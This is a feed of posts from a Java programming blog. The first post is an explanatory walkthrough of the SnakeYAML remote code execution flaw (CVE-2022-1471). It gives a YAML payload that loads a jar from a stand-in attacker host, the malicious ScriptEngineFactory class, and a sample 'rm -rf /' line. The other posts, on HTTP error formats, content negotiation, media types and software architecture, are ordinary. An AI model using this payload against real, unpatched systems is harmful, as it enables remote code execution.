Programming and Stuff - Michael Scharhag's Java development blogMichael Scharhaghttps://www.mscharhag.comA blog about programming and software development topics, mostly focused on Java technologies including Java EE, Spring and Grails.http://www.mscharhag.com/posts2023-06-06T18:31:51ZAndroidArchitectureCode QualityGrailsGroovyHibernateHTTPIntelliJ IDEAJavaJava EEJPAJUnitKotlinLocalizationMicroservicesMongoDBMySQLRESTSecuritySolrSpringSpring DataSpring SecurityTools2023-06-06T18:31:51ZConstructing a malicious YAML file for SnakeYAML (CVE-2022-1471)Michael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2023-06-04:1a572780-e964-4849-96fb-d2d04d1f65d72023-06-06T18:31:46Z2023-06-06T18:31:51Z<p>In this post we will take a closer look at SnakeYAML and <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-1471" rel="nofollow" target="_blank">CVE-2022-1471</a>.</p>
<p>SnakeYAML is a popular Java library for parsing YAML files. For example, Spring Boot uses SnakeYAML to parse YAML configuration files.</p>
<p>In late 2022, a critical vulnerability was discovered in SnakeYAML (referred to as CVE-2022-1471). This allowed an attacker to perform <a href="https://en.wikipedia.org/wiki/Arbitrary_code_execution" rel="nofollow" target="_blank">remote code execution</a> by providing a malicious YAML file. The problem was fixed in SnakeYAML 2.0, released in February 2023.</p>
<p>I recently looked into this vulnerability and learned a few things that I'll try to break down in this post.</p>
<h2>Parsing YAML files with SnakeYAML</h2>
<p>Before we look at the actual security issue, let us take a quick look at how SnakeYAML is actually used in a Java application.</p>
<p>Suppose we have the following YAML file named <em>person.yml</em>:</p>
<pre>
person:
firstname: john
lastname: doe
address:
street: fooway 42
city: baz town
</pre>
<p>In our Java code we can parse this YAML file with SnakeYAML like this:</p>
<pre class="brush: java">
Yaml yaml = new Yaml();
FileInputStream fis = new FileInputStream("/path/to/person.yml");
Map<String, Object> parsed = yaml.load(fis);
Map<String, Object> person = (Map<String, Object>) parsed.get("person");
person.get("firstname"); // "john"
person.get("lastname"); // "doe"
person.get("address"); // another map with keys "street" and "city"</pre>
<p><span class="code">yaml.load(fis)</span> returns a <span class="code">Map<String, Object></span> instance that we can navigate through to get the values defined in the YAML file.</p>
<h2>Mapping YAML content to objects</h2>
<p>Unfortunately, working with maps is usually not very pleasant. So SnakeYAML provides several ways to map YAML content to Java objects.</p>
<p>One way is to use the !! syntax to set a Java type within a YAML object:</p>
<pre>
person:
!!demo.Person
firstname: john
lastname: doe
address:
street: fooway 42
city: baz town</pre>
<p>This tells SnakeYAML to map the contents of the <em>person</em> object to the <span class="code">demo.Person</span> Java class, which looks like this:</p>
<pre class="brush: java">
public class Person {
private String firstname;
private String lastname;
private Address address; // has getter and setter for street and city
// getter and setter
}</pre>
<p>We can now parse the YAML file and get the <em>person</em> object with the mapped YAML values like this:</p>
<pre class="brush: java">
Map<String, Object> parsed = yaml.load(fis);
Person person = (Person) parsed.get("person");
</pre>
<p>SnakeYAML now creates a new Person object using the default constructor and uses setters to set the values defined in the YAML file. We can also instruct SnakeYAML to use constructor parameters instead of setters to set values.</p>
<p>For example, suppose we have the following simple <span class="code">Email</span> value object:</p>
<pre class="brush: java">
public class Email {
private String value;
public Email(String value) {
this.value = value;
}
// getter
}</pre>
<p>Within the YAML file, we can tell SnakeYAML to create an Email object by enclosing the constructor argument in square brackets:</p>
<pre>
person:
firstname: john
lastname: doe
email: !!demo.Email [ john@doe.com ]</pre>
<h2>Where is the security issue?</h2>
<p>What we have seen so far is really all we need to run malicious code from a YAML file. SnakeYAML allows us to create classes, pass constructor parameters and call setters from a provided YAML file.</p>
<p>Assume for a moment that there is a <span class="code">RunSystemCommand</span> class available in the class path. This class executes the system command passed in the constructor as soon as it is created. We could then provide the following YAML file:</p>
<pre>
foo: !!bad.code.RunSystemCommand [ rm -rf / ]</pre>
<p>Which would run the <span class="code">rm -rf /</span> system command right after it is instantiated by SnakeYAML.</p>
<p>Obviously this is a bit too simple, as such a class is unlikely to exist in the classpath. Also remember that we can only control constructors and setters through the YAML file. We cannot call arbitrary methods.</p>
<p>However, there are some interesting classes available in the standard Java library, that can be used. A very promising combination is <span class="code">ScriptEngineManager</span> together with <span class="code">URLClassLoader</span>. We will now learn a bit more about these two classes before we integrate them into a YAML file.</p>
<h2>Loading remote code via URLClassLoader</h2>
<p><span class="code">URLClassLoader</span> is a Java <span class="code">ClassLoader</span> that can load classes and resources from jar files located at a specified <span class="code">URL</span>. We can create <span class="code">URLClassLoader</span> like this:</p>
<pre class="brush: java">
URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
</pre>
<p><span class="code">URLClassLoader</span> takes an array of <span class="code">URL</span>s as constructor parameter. Here we pass a single <span class="code">URL</span> pointing to a jar file on a remote server controlled by the attacker. Our <span class="code">classLoader</span> instance can now be used to load classes from the remote jar file.</p>
<p>If you are curious about how to load a class from a <span class="code">Classloader</span> and use it via reflection, here is a simple example. However, this is not necessary for our SnakeYAML experiment.</p>
<pre class="brush: java">
// load class foo.bar.BadCode using the classLoader
Class<?> loadedClass = classLoader.loadClass("foo.bar.BadCode");
// create a new instance of foo.bar.BadCode using the default constructor
Object instance = loadedClass.newInstance();
// run the method runMaliciousCode() on our new instance
Method runMaliciousCode = loadedClass.getMethod("runMaliciousCode");
runMaliciousCode.invoke(instance);
</pre>
<h2>Using <span class="code">ScriptEngineManager</span> to run code for us</h2>
<p><span class="code">ScriptEngineManager</span> is another standard Java library class. It implements a discovery and instantiation mechanism for Java script engine support. <span class="code">ScriptEngineManager</span> uses the Java <a href="https://docs.oracle.com/javase/8/docs/technotes/guides/jar/jar.html#Service_Provider" target="_blank">Service Provider mechanism</a> to discover and instantiate available <span class="code">ScriptEngineFactory</span> classes.</p>
<p>The <span class="code">ClassLoader</span> used by <span class="code">ScriptEngineManager</span> can be passed as a constructor parameter:</p>
<pre class="brush: java">
URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);</pre>
<p>Here, the newly created <span class="code">ScriptEngineManager</span> will look for <span class="code">ScriptEngineFactory</span> implementations in our attacker-controlled remote jar. And more dangerously: It will instantiate eligible classes from that jar, giving the attacker the ability to run their own code.</p>
<h2>But what content must be provided in the remote jar file?</h2>
<p>We start by creating a malicious implementation of <span class="code">ScriptEngineFactory</span>:</p>
<pre class="brush: java">
package foo.bar;
public class BadScriptEngineFactory implements ScriptEngineFactory {
@Override
public String getEngineName() {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
throw new RuntimeException(e);
}
return null;
}
// empty stubs for other interface methods
}</pre>
<p>The first method that <span class="code">ScriptEngineManager</span> calls after instantiating a <span class="code">ScriptEngineFactory</span> is <span class="code">getEngineName()</span>. So we use this method to execute our malicious code. In this example, we will simply run the <span class="code">calc</span> system command, which will start the calculator on a Windows system. This is a simple proof, that we can run a system command from the provided jar file.</p>
<p>As mentioned earlier, <span class="code">ScriptEngineManager</span> uses the Java Service Provider mechanism to find classes that implement the <span class="code">ScriptEngineFactory</span> interface.</p>
<p>So we need to create a service provider configuration for our <span class="code">ScriptEngineFactory</span>. We do this by creating a file called <em>javax.script.ScriptEngineFactory</em> in the <em>META-INF/services</em> directory. This file must contain the fully qualified name of our <span class="code">ScriptEngineFactory</span>:</p>
<pre>
foo.bar.BadScriptEngineFactory</pre>
<p>We then package the class and configuration file into a jar file called <em>malicious-code.car</em>. The final layout inside the jar file looks like this:</p>
<ul style="list-style: circle; padding-left: 20px;">
<li>malicious-code.jar
<ul style="list-style: circle; padding-left: 20px;">
<li>META-INF
<ul style="list-style: circle; padding-left: 20px;">
<li>services
<ul style="list-style: circle; padding-left: 20px;">
<li>javax.script.ScriptEngineFactory</li>
</ul>
</li>
<li>MANIFEST.MF</li>
</ul>
</li>
<li>foo
<ul style="list-style: circle; padding-left: 20px;">
<li>bar
<ul style="list-style: circle; padding-left: 20px;">
<li>BadScriptEngineFactory.class</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>We can now put this jar file on a server and make it available to the <span class="code">URLClassLoader</span> used by the <span class="code">ScriptEngineManager</span>.</p>
<p>To recap the snippet shown earlier:</p>
<pre class="brush: java">
URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);</pre>
<p><span class="code">ScriptEngineManager</span> should now detect the <span class="code">BadScriptEngineFactory</span> class within the malicious-code.jar file. Once instantiated, it calls the <span class="code">getEngineName()</span> method, which executes the <span class="code">calc</span> system command. So running this code on a Windows system should open the Windows Calculator.</p>
<h2>Constructing a malicious YAML file</h2>
<p>Now we know enough to return to our original goal: constructing a malicious YAML file for SnakeYAML. As you may have noticed, the previous snippet only included constructor calls and the construction of an array. Both of these can be expressed within a YAML file.</p>
<p>So the final YAML file looks like this:</p>
<pre>
person: !!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL [http://attacker.com/malicious-code.jar]
]]
]</pre>
<p>We create a simple <em>person</em> YAML object. For the value we use the !! syntax we saw earlier to create a <span class="code">ScriptEngineManager</span>.</p>
<p>As a constructor parameter we pass a <span class="code">URLClassLoader</span> with a <span class="code">URL</span> pointing to our malicious jar file. Notice that we open two square brackets after <span class="code">URLClassLoader</span>. One to indicate that a constructor argument follows and a second to define an array.</p>
<p>When this YAML file is parsed with a vulnerable version of SnakeYAML on a Windows system, the calculator opens. This proves that an attacker is able to run code and execute system commands by providing a malicious YAML file.</p>2023-06-06T18:31:51ZA standardized error format for HTTP responsesMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2022-08-09:bd9b6b01-b276-4277-9c71-5d9861c6f58e2022-08-10T18:42:44Z2022-08-15T16:11:41Z<p>HTTP uses <a href="https://www.mscharhag.com/api-design/http-status-codes" target="_blank">status codes</a> to indicate the result of the servers attempt to satisfy the request. In case the server is unable to process the request we can choose from a variety of HTTP error codes.</p>
<p>Unfortunately status codes alone often do not provide enough information for API clients. For example, a server might respond with the status code 400 (Bad Request) to indicate the client sent an invalid request. Wouldn't it be nice if the response body would tell us what specific part of the request was invalid or how to resolve the problem?</p>
<p>Status codes are used to define higher level error classes while error details are usually part of the response body. Many APIs use a custom error format for response bodies to provide additional problem information. However, there is also a standard that can help us here, defined in <a href="https://datatracker.ietf.org/doc/html/rfc7807" target="_blank">RFC 2707</a>.</p>
<p>RFC 7807 defines a data model for problem details in JSON and XML. Before coming up with a new generic <em>fault </em>or <em>error</em> response format for you API, it might be worth looking into RFC 7807. However, it is absolutely fine to use your own domain-specific format if this fits better to your application.</p>
<h2>RFC 7807: Problem Details for HTTP APIs</h2>
<p>A HTTP response using RFC 7807 might look like this:</p>
<pre>
HTTP/1.1 400 Bad request
Content-Type: application/problem+json
Content-Language: en
{
"type": "https://api.my-cool-example.com/problems/required-field-missing",
"title": "Required field is missing",
"detail": "Article with id 1234 cannot be updated because the required field 'title' is missing",
"status": 400,
"instance": "/articles/1234",
"field": "title"
}
</pre>
<p>As usual, the HTTP status code (400, Bad request) gives us a broad indication of the problem. Notice the response Content-Type of <em>application/problem+json</em>. This tells us the response contains a RFC 7807 compliant body. When using XML instead of JSON the Content-Type <em>application/problem+xml</em> is used.</p>
<p>A problem details JSON response can have the following members:</p>
<ul>
<li><em>type </em>(string) - A URI reference that identifies the problem type.</li>
<li><em>title </em>(string) - A short human-readable summary of the problem type. It should not change between multiple occurrences of the same problem type, except for purposes of localization.</li>
<li><em>status </em>(number) - The HTTP status code generated by the origin server.</li>
<li><em>detail </em>(string) - A human-readable description of this specific problem occurrence.</li>
<li><em>instance </em>(string) - A URI that identifies the resource related to this specific problem occurrence.</li>
</ul>
<p>All fields are optional. However, you should at least provide a <em>type</em> value as this is used by consumers to identify the specific problem type. Consumers should not parse the <em>title </em>or <em>detail</em> fields.</p>
<h2>Problem types</h2>
<p>Problem types are used to identify specific problems. A problem type must document:</p>
<ul>
<li>A type URI (that is used in the <em>type </em>field of the response).</li>
<li>A title that describes the problem (used in the <em>title</em> field of the response).</li>
<li>The HTTP status code it is used with.</li>
</ul>
<p>The type URI should resolve to a human-readable documentation of the problem (e.g. a HTML document). This URI should be under your control and stable over time.</p>
<p>Problem types may also specify the use of a <em>Retry-After</em> response header if appropriate.</p>
<p>RFC 7807 reserves one special URI as a problem type: <em>about:blank</em>. The problem type <em>about:blank</em> can be used if the problem has no additional semantics besides that of the HTTP status code. In this case, the title should be the same as the HTTP status phrase for that code (e.g. <em>Bad Request</em> for HTTP status 400).</p>
<h2>Extension members</h2>
<p>Problem types may extend the problem details object with additional members to provide additional information.</p>
<p>The <em>field </em>member from the example response shown above is an example of such an extension member. It belongs to the <em>required-field-missing</em> problem type and indicates the missing field. A consumer might parse this member to construct an appropriate error message for the end-user.</p>
<h2>Conclusion</h2>
<p>HTTP status codes alone are often not enough to provide a meaningful problem description.</p>
<p>RFC 7807 defines a standardized format for a more detailed problem descriptions within the body of an HTTP response. Before coming up with just another custom error response format, it might be a good idea to look at the RFC 7807 problem format.</p>2022-08-15T16:11:41ZHTTP - Content negotiationMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-11-21:76d1ca17-984a-4f12-8963-be3d8f8acb8c2021-11-22T17:24:34Z2021-11-22T17:24:34Z<p>With HTTP, resources are identified using URIs. And a uniquely identified resource might support multiple resource representations. A representation is a specific form of a particular resource.</p>
<p>For example:</p>
<ul>
<li>a HTML page <em>/index.html</em> might be available in different languages</li>
<li>product data located at <em>/products/123</em> can be served in JSON, XML or CSV</li>
<li>an avatar image <em>/user/avatar</em> might available in JPEG, PNG and GIF formats</li>
</ul>
<p>In all these cases one underlying resource has multiple different representations.</p>
<p><em>Content negotiation</em> is the mechanism used by clients and servers to decide which representation should be used.</p>
<h2>Server-driven and agent-driven content negotiation</h2>
<p>We can differentiate between <em>server-driven</em> and <em>agent-driven</em> content negotiation.</p>
<p>With <em>server-driven</em> content negotiation the client tells the server which representations are preferable. The server then picks the representation that best fits the clients needs.</p>
<p>When using <em>agent-driven</em> content negotiation the server tells the client which representations are available. The client then picks the best matching option.</p>
<p>In practice nearly only <em>server-driven</em> negotiation is used. Unfortunately, there is no standardized format for doing <em>agent-driven</em> negotiation. Additionally, <em>agent-driven</em> negotiation is usually also worse for performance as it requires an additional request / response round trip. In the rest of this article we will therefore focus on <em>server-driven</em> negotiation.</p>
<h2>Accept headers</h2>
<p>With server-driven negotiation the client uses headers to indicate supported content formats. A server-side algorithm then uses these headers to decide which resource representation should be returned.</p>
<p>Most commonly used is the <em>Accept</em>-Header, which communicates the <a href="http://www.mscharhag.com/api-design/media-types-content-type-header" target="_blank">media-type</a> preferred by the client. For example, consider the following simple HTTP request containing an <em>Accept</em> header:</p>
<pre>
GET /monthly-report
Accept: text/html; q=1.0, text/*; q=0.8</pre>
<p>The header tells the server that the client understands HTML (media-type <em>text/html</em>) and other text based formats (mediatype <em>text/*</em>).</p>
<p><em>text/*</em> indicates that all <em>subtypes </em>of the text <em>type </em>are supported. To indicate that all media types are supported we can use <em>*/*</em>.</p>
<p>In this example HTML is preferred over other text based formats because it has a higher quality factor (<em>q</em>).</p>
<p>Ideally a server would respond with a HTML document to this request. For example:</p>
<pre>
HTTP/1.1 200 OK
Content-Type: text/html
<html>
<body>
<h1>Monthly report</h1>
...
</body>
</html></pre>
<p>If returning HTML is not feasible, the server can also respond with another text based format, like<em> text/plain</em>:</p>
<pre>
200 OK
Content-Type: text/plain
Monthly report
Bla bli blu
...</pre>
<p>Besides the <em>Accept </em>header there are also the <em>Accept-Language</em> and <em>Accept-Encoding</em> headers, we can use. <em>Accept-Language</em> indicates the language preference of the client while <em>Accept-Encoding</em> defines the acceptable content encodings.</p>
<p>Of course all these headers can be used together. For example:</p>
<pre>
GET /monthly-report
Accept: text/html
Accept-Language: en-US; q=1.0, en; q=0.9, fr; q=0.4
Accept-Encoding: gzip, br</pre>
<p>Here the client indicates that he prefers</p>
<ul>
<li>an HTML document</li>
<li>US English (preferred, <em>q=1.0</em>) but other English variations are also fine (<em>q=0.9</em>). If English is not available, French can do the job too (<em>q=0.4</em>)</li>
<li><em>gzip</em> and brotli (<em>br</em>) encoding is supported</li>
</ul>
<p>An acceptable response might look like this:</p>
<pre>
200 Ok
Content-Type: text/html
Content-Language: en
Content-Encoding: gzip
<gzipped html document></pre>
<h2>What if the server cannot return an acceptable response?</h2>
<p>If the server is unable to fulfill the clients preferences the HTTP status code 406 (Not Acceptable) can be returned. This status code indicates that the server is unable to produce a response matching the clients preference.</p>
<p>Depending on the situation it might also be viable to return a response that does not exactly match the clients preference. For example, assume no language provided in the <em>Accept-Language</em> header is supported by the server. In this case, it can still be a valid option to return a response using a predefined default language. This might be more useful for the client than nothing. In this case, the client can look at the <em>Content-Language</em> header of the response and decide if he wants to use the response or ignore it.</p>
<h2>Content negotiation in REST APIs</h2>
<p>For REST APIs it can be a viable option to support more than one standard representation for resources. For example, with content negotiation we can support JSON and XML and let the client decide what he wants to use.</p>
<p>CSV can also be an interesting option to consider in certain situations as the response can directly be viewed with tools like Excel. For example, consider the following request:</p>
<pre>
GET /users
Accept: text/csv
</pre>
<p>Instead of returning a JSON (or XML) collection, the server now can respond with a list of users in CSV format.</p>
<pre>
HTTP/1.1 200 Ok
Content-Type: text/csv
Id;Username;Email
1;john;john.doe@example.com
2;anna91;anna91@example.com</pre>
<h3> </h3>
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>2021-11-22T17:24:34ZAvoid leaking domain logicMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-10-23:b271546e-1027-441f-bc49-59f8259eba822021-11-01T11:23:49Z2021-11-01T11:23:53Z<p>Many software architectures try to separate domain logic from other parts of the application. To follow this practice we always need to know what actually is domain logic and what is not. Unfortunately this is not always that easy to separate. If we get this decision wrong, domain logic can easily leak into other components and layers.</p>
<p>We will go through this problem by looking at examples using a hexagonal application architecture. If you are not familiar with <em>hexagonal architecture </em>(also called <em>ports and adapters architecture</em>) you might be interested in the previous post about the <a href="https://www.mscharhag.com/architecture/layer-onion-hexagonal-architecture" target="_blank">transition from a traditional layered architecture to a hexagonal architecture</a>.</p>
<p>Assume a shop system that publishes new orders to a messaging system (like Kafka). Our product owner now tells us that we have to listen for these order events and persist the corresponding order in the database.</p>
<p>Using hexagonal architecture the integration with a messaging system is implemented within an <em>adapter</em>. So, we start with a simple adapter implementation that listens for Kafka events:</p>
<pre class="brush: java">
@AllArgsConstructor
public class KafkaAdapter {
private final SaveOrderUseCase saveOrderUseCase;
@KafkaListener(topic = ...)
public void onNewOrderEvent(NewOrderKafkaEvent event) {
Order order = event.getOrder();
saveOrderUseCase.saveOrder(order);
}
}</pre>
<p>In case you are not familiar with the <span class="code">@AllArgsConstructor</span> annotation from <a href="https://projectlombok.org/" target="_blank">project lombok</a>: It generates a constructor which accepts each field (here <span class="code">saveOrderUseCase</span>) as parameter.</p>
<p>The adapter delegates the saving of the order to a <span class="code">UseCase</span> implementation.</p>
<p><span class="code">UseCase</span>s are part of our domain core and implements domain logic, together with the domain model. Our simple example <span class="code">UseCase</span> looks like this:</p>
<pre class="brush: java">
@AllArgsConstructor
public class SaveOrderUseCase {
private final SaveOrderPort saveOrderPort;
public void saveOrder(Order order) {
saveOrderPort.saveOrder(order);
}
}</pre>
<p>Nothing special here. We simply use an outgoing <span class="code">Port</span> interface to persist the passed order.</p>
<p>While the shown approach might work fine, we have a significant problem here: Our business logic has leaked into the Adapter implementation. Maybe you are wondering: <em>what business logic?</em></p>
<p>We have a simple business rule to implement: Everytime a new order is retrieved it should be persisted. In our current implementation this rule is implemented by the adapter while our business layer (the <span class="code">UseCase</span>) only provides a generic save operation.</p>
<p>Now assume, after some time, a new requirement arrives: Every time a new order is retrieved, a message should be written to an audit log.</p>
<p>With our current implementation we cannot write the audit log message within <span class="code">SaveOrderUseCase</span>. As the name suggests the UseCase is for <em>saving an order</em> and not for <em>retrieving a new order</em> and therefore might be used by other components. So, adding the audit log message here might have undesired side-effects.</p>
<p>The solution is simple: We write the audit log message in our adapter:</p>
<pre class="brush: java">
@AllArgsConstructor
public class KafkaAdapter {
private final SaveOrderUseCase saveOrderUseCase;
private final AuditLog auditLog;
@KafkaListener(topic = ...)
public void onNewOrderEvent(NewOrderKafkaEvent event) {
Order order = event.getOrder();
saveOrderUseCase.saveOrder(order);
auditLog.write("New order retrieved, id: " + order.getId());
}
}</pre>
<p>And now we have made it worse. Even more business logic has leaked into the adapter.</p>
<p>If the <span class="code">auditLog</span> object writes messages into a database, we might also have screwed up transaction handling, which is usually not handled in an incoming adapter.</p>
<h2>Using more specific domain operations</h2>
<p>The core problem here is the generic <span class="code">SaveOrderUseCase</span>. Instead of providing a generic save operation to adapters we should provide a more specific UseCase implementation.</p>
<p>For example, we can create a <span class="code">NewOrderRetrievedUseCase</span> that accepts newly retrieved orders:</p>
<pre class="brush: java">
@AllArgsConstructor
public class NewOrderRetrievedUseCase {
private final SaveOrderPort saveOrderPort;
private final AuditLog auditLog;
@Transactional
public void onNewOrderRetrieved(Order newOrder) {
saveOrderPort.saveOrder(order);
auditLog.write("New order retrieved, id: " + order.getId());
}
}</pre>
<p>Now both business rules are implemented within the UseCase. Our adapter implementation is now simply responsible for mapping incoming data and passing it to the use case:</p>
<pre class="brush: java">
@AllArgsConstructor
public class KafkaAdapter {
private final NewOrderRetrievedUseCase newOrderRetrievedUseCase;
@KafkaListener(topic = ...)
public void onNewOrderEvent(NewOrderKafkaEvent event) {
NewOrder newOrder = event.toNewOrder();
newOrderRetrievedUseCase.onNewOrderRetrieved(newOrder);
}
}</pre>
<p>This change only seems to be a small difference. However, for future requirements, we now have a specific location to handle incoming orders in our business layer. Otherwise, chances are high that with new requirements we leak more business logic into places where it should not be located.</p>
<p>Leaks like this happen especially often with too generic <em>create</em>, <em>save</em>/<em>update </em>and <em>delete </em>operations in the domain layer. So, try to be very specific when implementing business operations.</p>2021-11-01T11:23:53ZMedia types and the Content-Type headerMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-09-27:024dad8a-b409-44fc-a3f2-5d803337c1502021-10-06T19:44:10Z2021-10-06T19:44:15Z<p>A <em>Media type</em> (formerly known as <em>MIME type</em>) is an identifier for file formats and format contents. Media types are used by different internet technologies like e-mail or HTTP.</p>
<p>Media types consist of a <em>type</em> and a <em>subtype</em>. It can optionally contain a <em>suffix </em>and one or more <em>parameters</em>. Media types follow this syntax:</p>
<pre>
type "/" [tree "."] subtype ["+" suffix]* [";" parameter]
</pre>
<p>For example the media type for JSON documents is:</p>
<pre>
application/json</pre>
<p>It consists of the type <span class="code">application</span> with the subtype <span class="code">json</span>.</p>
<p>A HTML document with UTF-8 encoding can be expressed as:</p>
<pre>
text/html; charset=UTF-8</pre>
<p>Here we have the type <span class="code">text</span>, the subtype <span class="code">html</span> and a parameter <span class="code">charset=UTF-8</span> indicating UTF-8 character encoding.</p>
<p>A suffix can be used to specify the underlying format of a media type. For example, <a href="https://en.wikipedia.org/wiki/Scalable_Vector_Graphics" target="_blank">SVG images</a> use the media type:</p>
<pre>
image/svg+xml</pre>
<p>The type is <span class="code">image</span>, <span class="code">svg</span> is the subtype and <span class="code">xml</span> the suffix. The suffix tells us that the SVG file format is based on <a href="https://en.wikipedia.org/wiki/XML" target="_blank">XML</a>.</p>
<p>Note that subtypes can be organized in a hierarchical tree structure. For example, the binary format used by <a href="https://thrift.apache.org/" target="_blank">Apache Thrift</a> uses the following media type:</p>
<pre>
application/vnd.apache.thrift.binary</pre>
<p><em>vnd</em> is a standardized prefix that tells us this is a vendor specific media type.</p>
<h2>The Content-Type header</h2>
<p>With HTTP any message that contains an entity-body should include a <em>Content-Type</em> header to define the media type of the body.</p>
<p>The <a href="https://datatracker.ietf.org/doc/html/rfc2616#section-7.2.1" target="_blank">RFC </a>says:</p>
<blockquote>
<p>Any HTTP/1.1 message containing an entity-body SHOULD include a Content-Type header field defining the media type of that body. If and only if the media type is not given by a Content-Type field, the recipient MAY attempt to guess the media type via inspection of its content and/or the name extension(s) of the URI used to identify the resource. If the media type remains unknown, the recipient SHOULD treat it as type "application/octet-stream".</p>
</blockquote>
<p>The RFC allows clients to guess the media type if the Content-Type header is not present. However, this should be avoided in any case.</p>
<p>Guessing the media-type of a piece of data is called <a href="https://en.wikipedia.org/wiki/Content_sniffing" target="_blank"><em>Content sniffing</em></a> (or MIME-sniffing). This practice was (and sometimes is still) used by web browsers and accounts for multiple security vulnerabilities. To explicitly tell browsers not to guess certain media types the following header can be added:</p>
<pre>
X-Content-Type-Options: nosniff</pre>
<p>Note that the <em>Content-Type</em> header always contains the media type of the original resource, before any content encoding is applied. Content encoding (like <em>gzip </em>compression) is indicated by the <em>Content-Encoding</em> header.</p>2021-10-06T19:44:15ZFrom layers to onions and hexagonsMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-09-12:93401a64-4166-440d-8abc-3ee9000229e22021-09-20T15:26:39Z2021-09-20T15:26:43Z<p>In this post we will explore the transition from a classic layered software architecture to a hexagonal architecture. The <a href="https://en.wikipedia.org/wiki/Hexagonal_architecture_(software)" target="_blank">hexagonal architecture</a> (also called ports and adapters architecture) is a design pattern to create loosely coupled application components.</p>
<p>This post was inspired by a German article from Silas Graffy called <a href="https://www.maibornwolff.de/blog/von-schichten-zu-ringen-hexagonale-architekturen-erklaert" target="_blank">Von Schichten zu Ringen - Hexagonale Architekturen erklärt</a>.</p>
<h2>Classic layers</h2>
<p><a href="https://en.wikipedia.org/wiki/Multitier_architecture" target="_blank">Layering</a> is one of the most widely known techniques to break apart complicated software systems. It has been promoted in many popular books, like <a href="https://www.amazon.com/-/en/dp/0321127420" target="_blank"><em>Patterns of Enterprise Application Architecture</em></a> by Martin Fowler.</p>
<p>Layers allows us to build software on top of a lower level layer without knowing the details about any of the lower level layers. In an ideal world we can even replace lower level layers with different implementations. While the number of layers can vary we mostly see three or four layers in practice.</p>
<p>Here, we have an example diagram of a three layer architecture:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-01.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-01.jpg" style="width: 100%; max-width: 350px" /></a></p>
<p>The <em>presentation </em>layer contains components related to user (or API) interfaces. In the <em>domain </em>layer we find the logic related to the problem the application solves. The <em>database </em>access layer is responsible database interaction.</p>
<p>The dependency direction is from top to bottom. The code in the <em>presentation </em>layer depends on code in the <em>domain </em>layer which itself does depend on code located in the <em>database </em>layer.</p>
<p>As an example we will examine a simple use-case: <em>Creation of a new user</em>. Let's add related classes to the layer diagram:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-02.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-02.jpg" style="width: 100%; max-width: 375px" /></a></p>
<p>In the <em>database </em>layer we have a <span class="code">UserDao</span> class with a <span class="code">saveUser(..)</span> method that accepts a <span class="code">UserEntity</span> class. <span class="code">UserEntity</span> might contain methods required by <span class="code">UserDao</span> for interacting with the database. With ORM-Frameworks (like <a href="https://en.wikipedia.org/wiki/Jakarta_Persistence" target="_blank">JPA</a>) <span class="code">UserEntity</span> might contain information related to object-relational mapping.</p>
<p>The domain layer provides a <span class="code">UserService</span> and a <span class="code">User</span> class. Both might contain domain logic. <span class="code">UserService</span> interacts with <span class="code">UserDao</span> to save a <span class="code">User</span> in the database. <span class="code">UserDao</span> does not know about the <span class="code">User</span> object, so <span class="code">UserService</span> needs to convert <span class="code">User</span> to <span class="code">UserEntity</span> before calling <span class="code">UserDao.saveUser(..)</span>.</p>
<p>In the Presentation layer we have a <span class="code">UserController</span> class which interacts with the domain layer using <span class="code">UserService</span> and <span class="code">User</span> classes. The presentation also does have its own class to represent a user: <span class="code">UserDto</span> might contain utility methods to format field values for presentation in a user interface.</p>
<h2>What is the problem with this?</h2>
<p>We have some potential problems to discuss here.</p>
<p>First we can easily get the impression that the database is the most important part of the system as all other layers depend on it. However, in modern software development we no longer start with creating huge ER-diagrams for the database layer. Instead, we usually (should) focus on the business domain.</p>
<p>As the domain layer depends on the database layer the domain layer needs to convert its own objects (User) to objects the database layer knows how to use (<span class="code">UserEntity</span>). So we have code that deals with database layer specific classes located in the domain layer. Ideally we want to have the domain layer to focus on domain logic and nothing else.</p>
<p>The domain layer is directly using implementation classes from the database layer. This makes it hard to replace the database layer with different implementations. Even if we do not want to plan for replacing the database with a different storage technology this is important. Think of replacing the database layer with mocks for unit testing or using in-memory databases for local development.</p>
<h2>Abstraction with interfaces</h2>
<p>The latest mentioned problem can be solved by introducing interfaces. The obvious and quite common solution is to add an interface in the database layer. Higher level layers use the interface and do not depend on implementation classes.</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-03.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-03.jpg" style="width: 100%; max-width: 375px" /></a></p>
<p>Here we split the <span class="code">UserDao</span> class into an interface (<span class="code">UserDao</span>) and an implementation class (<span class="code">UserDaoImpl</span>). <span class="code">UserService</span> only uses the <span class="code">UserDao</span> interface. This abstraction gives us more flexibility as we can now change <span class="code">UserDao</span> implementations in the database layer.</p>
<p>However, from the layer perspective nothing changed. We still have code related to the database layer in our domain layer.</p>
<p>Now, we can do a little bit of magic by moving the interface into the domain layer:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-04.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-04.jpg" style="width: 100%; max-width: 375px" /></a></p>
